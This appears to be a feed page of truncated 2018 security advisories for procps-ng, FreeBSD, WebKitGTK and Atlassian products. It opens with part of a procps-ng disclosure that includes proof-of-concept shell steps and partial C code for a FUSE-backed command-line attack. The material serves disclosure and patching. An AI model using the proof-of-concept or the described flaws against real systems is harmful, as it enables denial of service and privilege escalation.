empty. In this very unlikely scenario, an attacker can carry out an LPE (Local Privilege Escalation) if an administrator executes top in /tmp (for example), by exploiting one of several vulnerabilities in top's config_file() function. 4. Denial of Service in ps (CVE-2018-1123) An attacker can overflow the output buffer of ps, when executed by another user, administrator, or script: a denial of service only (not an LPE), because ps mmap()s its output buffer and mprotect()s its last page with PROT_NONE (an effective guard page). 5. Local Privilege Escalation in libprocps (CVE-2018-1124) An attacker can exploit an integer overflow in libprocps's file2strvec() function and carry out an LPE when another user, administrator, or script executes a vulnerable utility (pgrep, pidof, pkill, and w are vulnerable by default; other utilities are vulnerable if executed with non-default options). Moreover, an attacker's process running inside a container can trigger this vulnerability in a utility running outside the container: the attacker can exploit this userland vulnerability and break out of the container or chroot. We will publish our proof-of-concept exploits in the near future. Additionally, CVE-2018-1125 has been assigned to 0008-pgrep-Prevent-a-potential-stack-based-buffer-overflo.patch, and CVE-2018-1126 to 0035-proc-alloc.-Use-size_t-not-unsigned-int.patch. 1. FUSE-backed /proc/PID/cmdline (CVE-2018-1120) In this experiment, we add a sleep(60) to hello_read() in https://github.com/libfuse/libfuse/blob/master/example/hello.c and compile it, mount it on /tmp/fuse, and mmap() /tmp/fuse/hello onto the command-line arguments of a simple proof-of-concept: $ gcc -Wall hello.c `pkg-config fuse --cflags --libs` -o hello $ mkdir /tmp/fuse $ ./hello /tmp/fuse $ cat > fuse-backed-cmdline.c << "EOF" #include #include #include #include #include #include #include #include #define die() do { \ fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \ exit(EXIT_FAILURE); \ } while (0) #define PAGESZ ((size_t)4096) int main(const int argc, const char * const argv[]) { if (argc <= 0) die(); const char * const arg_start = argv[0]; const char * const last_arg = argv[argc-1]; const char * const arg_end = last_arg + strlen(last_arg) + 1; if (arg_end <= arg_start) die(); const size_t len = arg_
FreeBSD Security Advisory FreeBSD-SA-18:06.debugreg
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:06.debugreg Security Advisory The FreeBSD Project Topic: Mishandling of x86 debug exceptions Category: core Module: kernel Announced: 2018-05-08 Credits:Nick Peterson, Everdox Tech LLC https://www.linkedin.com/in/everdox Andy Lutomirski Affects:All supported versions of FreeBSD. Corrected: 2018-05-08 17:03:33 UTC (stable/11, 11.2-PRERELEASE) 2018-05-08 17:12:10 UTC (releng/11.1, 11.1-RELEASE-p10) 2018-05-08 17:05:39 UTC (stable/10, 10.4-STABLE) 2018-05-08 17:12:10 UTC (releng/10.4, 10.4-RELEASE-p9) CVE Name: CVE-2018-8897 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background On x86 architecture systems, the stack is represented by the combination of a stack segment and a stack pointer, which must remain in sync for proper operation. Instructions related to manipulating the stack segment have special handling to facilitate consistency with changes to the stack pointer. II. Problem Description The MOV SS and POP SS instructions inhibit debug exceptions until the instruction boundary following the next instruction. If that instruction is a system call or similar instruction that transfers control to the operating system, the debug exception will be handled in the kernel context instead of the user context. III. Impact An authenticated local attacker may be able to read sensitive data in kernel memory, control low-level operating system functions, or may panic the system. IV. Workaround No workaround is available. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, using either a binary or source code patch, and then reboot. 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install And reboot. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 11.1] # fetch https://security.FreeBSD.org/patches/SA-18:06/debugreg.11.1.patch # fetch https://security.FreeBSD.org/patches/SA-18:06/debugreg.11.1.patch.asc # gpg --verify debugreg.11.1.patch.asc [FreeBSD 10.4] # fetch https://security.FreeBSD.org/patches/SA-18:06/debugreg.10.4.patch # fetch https://security.FreeBSD.org/patches/SA-18:06/debugreg.10.4.patch.asc # gpg --verify debugreg.10.4.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile and install your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/10/r70 releng/10.4/ r71 stable/11/r69 releng/11.1/ r71 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8897> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-18:06.debugreg.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlrx3HhfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cK/jhAAmPPCFZRMvbyG0VBCBqo5COFZ/32IMOWFDGMlsSi+CEgcGM51SzYZi97c zsT/2RgMsvBdggk41wvXqp1gKxgIbJe22af7l+D18e6rDEesueJqSiizcHmfGQul X+ZRUkFxTkCNz0Ajp4clqbavuHNiCmiKmH/0X8LMk3
WebKitGTK+ Security Advisory WSA-2018-0004
WebKitGTK+ Security Advisory WSA-2018-0004 Date reported : May 07, 2018 Advisory ID: WSA-2018-0004 Advisory URL : https://webkitgtk.org/security/WSA-2018-0004.html CVE identifiers: CVE-2018-4121, CVE-2018-4200, CVE-2018-4204. Several vulnerabilities were discovered in WebKitGTK+. CVE-2018-4121 Versions affected: WebKitGTK+ before 2.20.0. Credit to Natalie Silvanovich of Google Project Zero. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4200 Versions affected: WebKitGTK+ before 2.20.2. Credit to Ivan Fratric of Google Project Zero. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: A memory corruption issue was addressed with improved state management. CVE-2018-4204 Versions affected: WebKitGTK+ before 2.20.1. Credit to Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative, found by OSS-Fuzz. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: A memory corruption issue was addressed with improved memory handling. We recommend updating to the last stable version of WebKitGTK+. It is the best way of ensuring that you are running a safe version of WebKitGTK+. Please check our website for information about the last stable releases. Further information about WebKitGTK+ Security Advisories can be found at: https://webkitgtk.org/security.html The WebKitGTK+ team, May 07, 2018
Advisory - Sourcetree for Windows - CVE-2018-5226
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 This email refers to the advisory found at https://confluence.atlassian.com/x/ERyUO . CVE ID: * CVE-2018-5226. Product: Sourcetree for Windows. Affected Sourcetree for Windows product versions: version < 2.5.5.0 Fixed Sourcetree for Windows product versions: * Sourcetree for Windows 2.5.5.0 has been released with a fix for this issue. Summary: This advisory discloses a critical severity security vulnerability. Versions of Sourcetree for Windows before version 2.5.5.0 are affected by this vulnerability. Customers who have upgraded Sourcetree for Windows to version 2.5.5.0 are not affected. Customers using Sourcetree for Mac are not affected. Customers who have downloaded and installed Sourcetree for Windows less than 2.5.5.0 please upgrade your Sourcetree for Windows installations immediately to fix this vulnerability. SourceTree for Windows - Argument injection via Mercurial tag names - CVE-2018-5226 Severity: Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment. Description: There was an argument injection vulnerability in Sourcetree for Windows via Mercurial repository tag name that is going to be deleted. An attacker with permission to create a tag on a Mercurial repository linked in Sourcetree for Windows is able to exploit this issue to gain code execution on the system. All versions of Sourcetree for Windows before 2.5.5.0 are affected by this vulnerability. Versions of Sourcetree for Windows before version 2.5.5.0 are affected by this vulnerability. This issue can be tracked at: https://jira.atlassian.com/browse/SRCTREEWIN-8509 . Fix: To address this issue, we've released the following versions containing a fix: * Sourcetree for Windows version 2.5.5.0 Remediation: Upgrade Sourcetree for Windows to version 2.5.5.0 or higher. The vulnerabilities and fix versions are described above. If affected, you should upgrade to the latest version immediately. For a full description of the latest version of Sourcetree for Windows, see the release notes found at https://www.sourcetreeapp.com/update/windows/ga/ReleaseNotes_2.5.5.html. You can download the latest version of Sourcetree for Windows from the download centre found at https://www.sourcetreeapp.com/. Acknowledgements: Atlassian would like to credit ZhangTianqi @ Tophant for reporting this issue to us. -BEGIN PGP SIGNATURE- iQJLBAEBCgA1FiEEXh3qw5vbMx/VSutRJCCXorxSdqAFAlrmhqAXHHNlY3VyaXR5 QGF0bGFzc2lhbi5jb20ACgkQJCCXorxSdqC8ww/+ORjM/G+atnsDvMBUfM58HBXm COJcgTZz6Q9iLRSmHnVeCTANphlZX3UB+HQdlXKntnOF6muSJ+VxvHYdIOLxuAdf aOLkN8LJehN07bjRpcoN8XBt3T0srEJvIcllth9mR013r2LwsZL6jzcaoU2M300G 2dPJpBK/NIZYWA/TOcdmNx88cJ+Vfc/WvqpHCfNd84ePu2jpN8lWvBuLgbwuWktG LFkCQYMnxnY1XEe8TwppX3NHdYT1ARdi0eEnyVGM5YzRSGpzgoCOASfcUibi4FcW Ux53XlC/G9yx+66tLiA3hE132Jb0iTe++x5OgskmLiyvYzenHoQCb3wnFGQVvxgl B8XPVPHEL2siT5o44dLP7pdHLHtPAeB0ZbeiXSzLSyBe5PhA3JCs/DzcpDvbB8B4 1g8Fr09hazUh0PiBidqw/C5NzdIxX7q4ydrxs/nMgG+hEw+unmdkvqLF2Eajjkf2 KtsKRzxXufL9oq7+DONsmf2fZS5XKhZpKJvEFcl5Ua/zrJOosFJcPggreD5TWH0E VbQEnDPGhopNf6RtrXduFvuR1XlioyREKUfJ5cn3NiZKQ/jnRwdyfaV42pwi87eo NiGQyPYV3kYxch60h/jn9nkvD48uppb9xjxZFz7ZnVQX3+cWijPX/Iwj2Djz5f/X n5qLhlW+VeOAIMyA3z0= =fjvl -END PGP SIGNATURE-
WebKitGTK+ Security Advisory WSA-2018-0003
WebKitGTK+ Security Advisory WSA-2018-0003 Date reported : April 04, 2018 Advisory ID : WSA-2018-0003 Advisory URL : https://webkitgtk.org/security/WSA-2018-0003.html CVE identifiers : CVE-2018-4101, CVE-2018-4113, CVE-2018-4114, CVE-2018-4117, CVE-2018-4118, CVE-2018-4119, CVE-2018-4120, CVE-2018-4122, CVE-2018-4125, CVE-2018-4127, CVE-2018-4128, CVE-2018-4129, CVE-2018-4133, CVE-2018-4146, CVE-2018-4161, CVE-2018-4162, CVE-2018-4163, CVE-2018-4165. Several vulnerabilities were discovered in WebKitGTK+. CVE-2018-4101 Versions affected: WebKitGTK+ before 2.20.0. Credit to Yuan Deng of Ant-financial Light-Year Security Lab. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4113 Versions affected: WebKitGTK+ before 2.20.0. Credit to OSS-Fuzz. Impact: Unexpected interaction with indexing types causing an ASSERT failure. Description: An array indexing issue existed in the handling of a function in JavaScriptCore. This issue was addressed through improved checks. CVE-2018-4114 Versions affected: WebKitGTK+ before 2.20.0. Credit to OSS-Fuzz. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4117 Versions affected: WebKitGTK+ before 2.20.0. Credit to an anonymous researcher. Impact: A malicious website may exfiltrate data cross-origin. Description: A cross-origin issue existed with the fetch API. This was addressed through improved input validation. CVE-2018-4118 Versions affected: WebKitGTK+ before 2.20.0. Credit to Jun Kokatsu (@shhnjk). Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4119 Versions affected: WebKitGTK+ before 2.20.0. Credit to an anonymous researcher working with Trend Micro’s Zero Day Initiative. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4120 Versions affected: WebKitGTK+ before 2.20.0. Credit to Hanming Zhang (@4shitak4) of Qihoo 360 Vulcan Team. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4122 Versions affected: WebKitGTK+ before 2.20.0. Credit to WanderingGlitch of Trend Micro's Zero Day Initiative. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4125 Versions affected: WebKitGTK+ before 2.20.0. Credit to WanderingGlitch of Trend Micro's Zero Day Initiative. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4127 Versions affected: WebKitGTK+ before 2.20.0. Credit to an anonymous researcher working with Trend Micro’s Zero Day Initiative. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4128 Versions affected: WebKitGTK+ before 2.20.0. Credit to Zach Markley. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4129 Versions affected: WebKitGTK+ before 2.20.0. Credit to likemeng of Baidu Security Lab working with Trend Micro's Zero Day Initiative. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4133 Versions affected: WebKitGTK+ before 2.20.0. Credit to Anton Lopanitsyn of Wallarm, Linus Särud of Detectify (detectify.com), Yuji Tounai of NTT Communications Corporation. Impact: Visiting a maliciously crafted website may lead to a cross- site scripting attack. Description: A cross-site scripting issue existed in WebKit. This issue was addressed with improved URL validation. CVE-2018-4146 Versions affected: We
Advisory - Fisheye and Crucible - CVE-2018-5223
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 This email refers to the advisory found at https://confluence.atlassian.com/x/aS5sO and https://confluence.atlassian.com/x/Zi5sO . CVE ID: * CVE-2018-5223. Product: Fisheye and Crucible. Affected Fisheye and Crucible product versions: version < 4.4.6 4.5.0 <= version < 4.5.3 Fixed Fisheye and Crucible product versions: * for 4.4.x, Fisheye 4.4.6 has been released with a fix for this issue. * for 4.5.x, Fisheye 4.5.3 has been released with a fix for this issue. * for 4.4.x, Crucible 4.4.6 has been released with a fix for this issue. * for 4.5.x, Crucible 4.5.3 has been released with a fix for this issue. Summary: This advisory discloses a critical severity security vulnerability in Fisheye and Crucible. Versions of Fisheye and Crucible before 4.4.6 (the fixed version for 4.4.x) and from 4.5.0 before 4.5.3 (the fixed version for 4.5.x) running on the Windows operating system are affected by this vulnerability. Customers who have upgraded Fisheye and Crucible installations to version 4.4.6 or 4.5.3 are not affected. Customers who have downloaded and installed Fisheye or Crucible less than 4.4.6 (the fixed version for 4.4.x) or who have downloaded and installed Fisheye or Crucible >= 4.5.0 but less than 4.5.3 (the fixed version for 4.5.x) please upgrade your Fisheye and Crucible installations immediately to fix this vulnerability. Argument injection through Mercurial repository uri handling on Windows (CVE-2018-5223) Severity: Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment. Description: Fisheye and Crucible did not correctly check if a configured Mercurial repository URI contained values that the Windows operating system may consider argument parameters. An attacker who has permission to add a repository in Fisheye or Crucible can execute code of their choice on systems that run a vulnerable version of Fisheye or Crucible on the Windows operating system. Versions of Fisheye and Crucible before 4.4.6 (the fixed version for 4.4.x) and from 4.5.0 before 4.5.3 (the fixed version for 4.5.x) running on the Windows operating system are affected by this vulnerability. This issue can be tracked at: https://jira.atlassian.com/browse/FE-7014 . Fix: To address this issue, we've released the following versions containing a fix: * Fisheye version 4.4.6 * Fisheye version 4.5.3 * Crucible version 4.4.6 * Crucible version 4.5.3 Remediation: Upgrade Fisheye and Crucible to version 4.5.3 or higher. The vulnerabilities and fix versions are described above. If affected, you should upgrade to the latest version immediately. If you are running Fisheye or Crucible 4.4.x and cannot upgrade to 4.5.3, upgrade to version 4.4.6. For a full description of the latest version of Fisheye, see the release notes found at https://confluence.atlassian.com/display/FISHEYE/Fisheye+releases. You can download the latest version of Fisheye from the download centre found at https://www.atlassian.com/software/fisheye/download. For a full description of the latest version of Crucible, see the release notes found at https://confluence.atlassian.com/display/CRUCIBLE/Crucible+releases. You can download the latest version of Crucible from the download centre found at https://www.atlassian.com/software/crucible/download. Support: If you have questions or concerns regarding this advisory, please raise a support request at https://support.atlassian.com/. -BEGIN PGP SIGNATURE- iQI0BAEBCgAeBQJaxYQsFxxzZWN1cml0eUBhdGxhc3NpYW4uY29tAAoJECQgl6K8 Unag478P/0AoVrjSEodJ/OAPX1ugd8Igd9ls2tNWykC3o9/gU6iMeutSS2dp0jK9 44DcU8uE1cjAewVul+llM2TZt+py7Ps6vFgH5U/y6oE+Jvdl5xIAdlbA/NNC3skn UnUZgGu84MTFnHAW+RS83/+2boy8Wt3hQlnslG/DUqqndqU5dMajwwK8tKRqGwSd JZgkULUyaUch5VGR8YK9lpbhZac9BzVrDqYwqamGZ/RjZJgQMjIF4eSLF9jJuIgT r6yte9Th8SlPHzzbc8t5bT2O2woAQ/ECnZMzNBtvnQlm2q085umrN1SOhDUocYfk S5P3T5oulBHie7/KOK9niHD8pLCsZZ12FzSfgPXKoNM/sJJ7Z5CwEqV+2iXzm/pl OftM0/RNPjeOcyUEPxc0woJXB5LBLdVQoJMk58HTmbhaq7ocgBNNieqpZElWOBV1 uX1OD5wGbmh924jaIhldclEGRH8DuOd54/6llV51K2r2GVkaSK603gM/5YXLH1fy FQLAADATzwiVwl4eKwgAfkssn3bwuYnokgGDZ8gozDY/SVUMF0mHhzqG0xvQu71m yFqEoZqbFzEWEVZ2K8tkINN389uj4WThlNBtEE/MC/mseWlK/+c2hOF6wVgF9ErU WwAjrH+0TttDCAgx7X8kZVxXfK6e0w/FFneWdC+5BYuNHX2xnwrX =oURS -END PGP SIGNATURE-
Advisory - Bamboo - CVE-2018-5224
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 This email refers to the advisory found at https://confluence.atlassian.com/x/PS9sO . CVE ID: * CVE-2018-5224. Product: Bamboo. Affected Bamboo product versions: 2.7.0 <= version < 6.3.3 6.4.0 <= version < 6.4.1 Fixed Bamboo product versions: * for 6.3.x, Bamboo 6.3.3 has been released with a fix for this issue. * for 6.4.x, Bamboo 6.4.1 has been released with a fix for this issue. Summary: This advisory discloses a critical severity security vulnerability. Versions of Bamboo starting with 2.7.0 before 6.3.3 (the fixed version for 6.3.x) and from version 6.4.0 before 6.4.1 (the fixed version for 6.4.x) running on the Windows operating system are affected by this vulnerability. Customers who have upgraded Bamboo to version 6.3.3 or 6.4.1 are not affected. Customers who have downloaded and installed Bamboo >= 2.7.0 but less than 6.3.3 (the fixed version for 6.3.x) or who have downloaded and installed Bamboo >= 6.4.0 but less than 6.4.1 (the fixed version for 6.4.x) please upgrade your Bamboo installations immediately to fix this vulnerability. Argument injection through Mercurial repository uri handling on Windows (CVE-2018-5224) Severity: Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment. Description: Bamboo did not correctly check if a configured Mercurial repository URI contained values that the Windows operating system may consider argument parameters. An attacker who has permission to create a repository in Bamboo, edit an existing plan in Bamboo that has a non-linked Mercurial repository, or create a plan in Bamboo either globally or in a project using Bamboo Specs can execute code of their choice on systems that run a vulnerable version of Bamboo on the Windows operating system. Versions of Bamboo starting with 2.7.0 before 6.3.3 (the fixed version for 6.3.x) and from version 6.4.0 before 6.4.1 (the fixed version for 6.4.x) running on the Windows operating system are affected by this vulnerability. This issue can be tracked at: https://jira.atlassian.com/browse/BAM-19743 . Fix: To address this issue, we've released the following versions containing a fix: * Bamboo version 6.3.3 * Bamboo version 6.4.1 Remediation: Upgrade Bamboo to version 6.4.1 or higher. The vulnerabilities and fix versions are described above. If affected, you should upgrade to the latest version immediately. If you are running Bamboo 6.3.x and cannot upgrade to 6.4.1, upgrade to version 6.3.3. For a full description of the latest version of Bamboo, see the release notes found at https://confluence.atlassian.com/display/BAMBOO/Bamboo+releases. You can download the latest version of Bamboo from the download centre found at https://www.atlassian.com/software/bamboo/download. Support: If you have questions or concerns regarding this advisory, please raise a support request at https://support.atlassian.com/. -BEGIN PGP SIGNATURE- iQI0BAEBCgAeBQJaxYQwFxxzZWN1cml0eUBhdGxhc3NpYW4uY29tAAoJECQgl6K8 Unag/K0P/0rDhyJHC2DaC4y+8GJKOjc+4FA3NNY0C1Fa3JhGouC936njlDxKW9nx vwXL5oxla1RKOGrSZmjJ6gu/HawAw98ATNUm54VSeynUXbWvOhpQC7PJ8fhxQSV1 N4/r4bRirkEuk/hyZBKFfEElvFsCLGO4lmhLTP1luVXDV0lB8i4AAbZPx+1BC8hS POy2wPvJ0H5H/inSN6HIq2FgE3z0lq5Ntb+moQnA/7zJH+5VyzYfSg+FeKYZTCVT lGmho6JVD84f1bpj/CR0SByd5pfu+rZhZj/2afkkjuGdmDolMpE99+zImZj9vTPi l85BZo1YKZkkUxHpErgAZKIevzInQH07pDPpeNMWVfI9w8mrE3TZj/cUHS/V87DE K1oxyz8D4WtqsnsWmSOocmzzan6k7IK7+kFBHqyjSetMGtqfjmzQbXEotWyki9+f g8A4bQKOXz8gPnUBUwJv86k5DBOkb7IsvXiJgEIuMzl4yq/qJmeCTGjOj2hNRg2w nowAAD4YDUbhsC3W3lVU2UaJokQ0Qf5jRgcuJimqDUqR3jrkpzPTuVyXy8rVLHg6 +TpcSlXluRnrEfYNaB4UwSsKW5zPktouROeU1QPhhHkdPt/JmAY/FZKv7Ti95r9o 5fjvbX/zaWhVTxnId2joi7tDsjkLYLd/mI72ycA/pkIIRENlRY6L =hdeb -END PGP SIGNATURE-
FreeBSD Security Advisory FreeBSD-SA-18:05.ipsec
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:05.ipsec Security Advisory The FreeBSD Project Topic: ipsec crash or denial of service Category: core Module: ipsec Announced: 2018-04-04 Credits:Maxime Villard Affects:All supported versions of FreeBSD. Corrected: 2018-01-31 09:24:48 UTC (stable/11, 11.1-STABLE) 2018-04-04 05:37:52 UTC (releng/11.1, 11.1-RELEASE-p9) 2018-01-31 09:26:28 UTC (stable/10, 10.4-STABLE) 2018-04-04 05:37:52 UTC (releng/10.4, 10.4-RELEASE-p8) 2018-04-04 05:37:52 UTC (releng/10.3, 10.3-RELEASE-p29) CVE Name: CVE-2018-6918 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The IPsec suite of protocols provide network level security for IPv4 and IPv6 packets. FreeBSD includes software originally developed by the KAME project which implements the various protocols that make up IPsec. In IPsec, the IP Authentication Header (AH) is used to provide protection against replay attacks and connectionless integrity and data origin authentication for IP datagrams. II. Problem Description The length field of the option header does not count the size of the option header itself. This causes a problem when the length is zero, the count is then incremented by zero, which causes an infinite loop. In addition there are pointer/offset mistakes in the handling of IPv4 options. III. Impact A remote attacker who is able to send an arbitrary packet, could cause the remote target machine to crash. IV. Workaround No workaround is available. Note that in FreeBSD 10 IPsec is not included in the kernel by default, but it is in FreeBSD 11. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterward, reboot the system. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterward, reboot the system. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-18:05/ipsec.patch # fetch https://security.FreeBSD.org/patches/SA-18:05/ipsec.patch.asc # gpg --verify ipsec.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/10/r328621 releng/10.3/ r331985 releng/10.4/ r331985 stable/11/r328620 releng/11.1/ r331985 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6918> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-18:05.ipsec.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlrEZuRfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cKpOxAAlcyr88qHimXmMWNelNe+RvNkRoQwlmOw5XCWmWFGt4bX6KyrPSNVkZXK 9bZr0+sYiEjHPstXy+F6v95wqShRiefwpLVNJkP6LFKdQJeuxy0Uwsgl/i3aZVHy q4iM+PgnMwt5FxzmIcFHjwZSGGaOw5p9dMlkFLxXQ6chafPutMbgkXMIGVGXEp4e iwQgmh7j5LbUED0P9G7sYpcEN+DKZLWIyvz6L/AJme
FreeBSD Security Advisory FreeBSD-SA-18:04.vt
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:04.vt Security Advisory The FreeBSD Project Topic: vt console memory disclosure Category: core Module: vt console Announced: 2018-04-04 Credits:Dr Silvio Cesare of InfoSect Affects:All supported versions of FreeBSD. Corrected: 2018-04-04 05:24:59 UTC (stable/11, 11.1-STABLE) 2018-04-04 05:33:56 UTC (releng/11.1, 11.1-RELEASE-p9) 2018-04-04 05:26:33 UTC (stable/10, 10.4-STABLE) 2018-04-04 05:33:56 UTC (releng/10.4, 10.4-RELEASE-p8) 2018-04-04 05:33:56 UTC (releng/10.3, 10.3-RELEASE-p29) CVE Name: CVE-2018-6917 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background On FreeBSD 11 and later, and FreeBSD 10.x systems that boot via UEFI, the default system video console is provided by the vt(4) driver. The console allows the user, including an unprivileged user, to load a font at runtime. II. Problem Description Insufficient validation of user-provided font parameters can result in an integer overflow, leading to the use of arbitrary kernel memory as glyph data. Characters that reference this data can be displayed on the screen, effectively disclosing kernel memory. III. Impact Unprivileged users may be able to access privileged kernel data. Such memory might contain sensitive information, such as portions of the file cache or terminal buffers. This information might be directly useful, or it might be leveraged to obtain elevated privileges in some way; for example, a terminal buffer might include a user-entered password. IV. Workaround The syscons sc(4) system console is not affected by this issue and may be used on systems that do not boot via UEFI. To use the syscons console, set the kern.vty tunable in /boot/loader.conf as described in sc(4), and reboot. No workaround is available for systems that boot via UEFI. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install A reboot is required after the upgrade. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-18:04/vt.patch # fetch https://security.FreeBSD.org/patches/SA-18:04/vt.patch.asc # gpg --verify vt.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/10/r331983 releng/10.3/ r331984 releng/10.4/ r331984 stable/11/r331982 releng/11.1/ r331984 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6917> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-18:04.vt.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlrEZttfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cI5CBAAmZS+2l3qNafZ0FQDKONeX+jiyJt6lPWk2L
Advisory - Bitbucket Server - CVE-2018-5225
